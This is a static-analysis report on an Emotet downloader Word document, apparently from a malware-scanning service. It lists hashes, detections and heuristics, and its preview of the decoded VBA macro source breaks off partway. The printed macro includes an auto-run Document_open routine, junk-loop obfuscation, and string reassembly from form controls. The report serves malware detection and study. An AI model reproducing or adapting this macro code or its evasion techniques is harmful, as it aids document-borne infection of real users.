Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 dbe02a8c741267d6…

MALICIOUS

Office (OLE)

178.8 KB Created: 2019-12-12 13:17:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: e495c1d1c3f4eb60ede6d5778dfee2a7 SHA-1: b750525d96239a9ac4b2c8579c29c0c768ad8065 SHA-256: dbe02a8c741267d609c6c5248a53303fb45e012d6e343b7a98ec30d4defa9579
262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7448070-0, indicating it is likely part of the Emotet botnet. Critical heuristics indicate the presence of obfuscated VBA macros, specifically a Document_Open macro that uses CreateObject and reassembles the dangerous API name 'winmgmts' from split string literals. This suggests the macro is designed to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-7448070-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7448070-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8720 bytes
SHA-256: 4eeb04229e81dfe706c59fc4a82ff604bc40edff259d24b105b2e1e8b800c71c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Vyvqzuvyv"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Cqwreudpec, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Nehjkaim = Mplkjouk To 0
      For Soignsrc = Syhpjurvr To 0
         Ederxwdu = (23 + Round(WOJOkxR3))
      Next
      Vasjzvavsifhz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Ivapwytobol = uzH To MZDUoaj1
         Qvoibjwxogk = ChrB(dANsZ68a4)
         Next
      For Ayuvxdscpad = 0 To 0
         Zclrvnrle = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Psimvmgqagtar = Ihhagvdzy To 0
      For Bemxxwsketxji = Bjviscftlbtfd To 0
         Tjxzlcecjx = (23 + Round(WOJOkxR3))
      Next
      Ymlxyriuu = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Wtwkbwdqpit = uzH To MZDUoaj1
         Mjxvxhmkkvg = ChrB(dANsZ68a4)
         Next
      For Duovhrpt = 0 To 0
         Ordffhsyf = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Prokwsaysy = Ibhsmjrhkgem To 0
      For Ngfpxxobrlwbg = Qpzejykjeaxip To 0
         Mbryeusdbx = (23 + Round(WOJOkxR3))
      Next
      Jvwkcnhtr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Jzdxaozpyb = uzH To MZDUoaj1
         Ujizfxlygdrbn = ChrB(dANsZ68a4)
         Next
      For Uvigshthzbw = 0 To 0
         Biifawbauoc = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Kekzylcfmlzal
End Sub

Attribute VB_Name = "Eqgqcukkqs"
Attribute VB_Base = "0{21FB5824-F079-4E17-8E1E-3180FAE51311}{E9A9A18F-FA77-4D29-BE77-0B4E0B3540B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Bvktkpmcp"
Function Gvrewgkb()
   For Febkcapmgqor = Dtmpuwwphqai To 0
      For Ppxtqzleg = Vmeesqwxpz To 0
         Mxdyqwkkuzhxr = (23 + Round(WOJOkxR3))
      Next
      Amjymsgyjrko = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Klitrlvn = uzH To MZDUoaj1
         Hwjovfhnzvvl = ChrB(dANsZ68a4)
         Next
      For Jffzthfi = 0 To 0
         Jozdahznl = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Fgalqfiwcdkn = Vyvqzuvyv.Cqwreudpec
   For Ggfuxnlyp = Istpqcarsxv To 0
      For Mvwczlcpvrkxa = Jtmhrmqvbbyoz To 0
         Kkmhicqi = (23 + Round(WOJOkxR3))
      Next
      Pxmbjrql = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Ylnckvaub = uzH To MZDUoaj1
         Cdshzlsivtlne = ChrB(dANsZ68a4)
         Next
      For Dusjhdxeezw = 0 To 0
         Mbwhxgmutukgx = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Spucpfsgd = Fgalqfiwcdkn + Eqgqcukkqs.Bznaxyfwp + Eqgqcukkqs.Zkvepwts + Eqgqcukkqs.Rygksenvkbp
   For Yeoyziucy = Axzlpxcvtrnh To 0
      For Kgepovubccer = Aynkrmowuqi To 0
         Rqrlxifocp = (23 + Round(WOJOkxR3))
      Next
      Kzyuxhxbnv = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Cptfoloh = uzH To MZDUoaj1
         Dllrgirayj = ChrB(dANsZ68a4)
         Next
      For Gmpbxike = 0 To 0
         Vnjhpazqafbav = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Cvukvxnunvnbd = Spucpfsgd + Eqgqcukkqs.Ydoehzjxowhl + Eqgqcukkqs.Ejxfdtxi.ControlTipText
   For Asddhtgzbw = Cewtwsfwgp To 0
      For Tyxclnzjm = Kmkmcrbh To 0
         Vkvdqjvasfkgy = (23 + Round(WOJOkxR3))
      Next
      Vdooxawfbl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Fdeeifexnc = uzH To MZDUoaj1
         Dejuqseobego = ChrB(dANsZ68a4)
         Next
      For Izzftsjypwoa = 0 To 0
         Tmvtftkt = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Gvrewgkb = Eeucouafvnce + Cvukvxnunvnbd + Eeucouafvnce
   For Lhgdygaw = Ndlebqrgts To 0
      For Qmhxsotndnnd = Spfruwhxjdv 
... (truncated)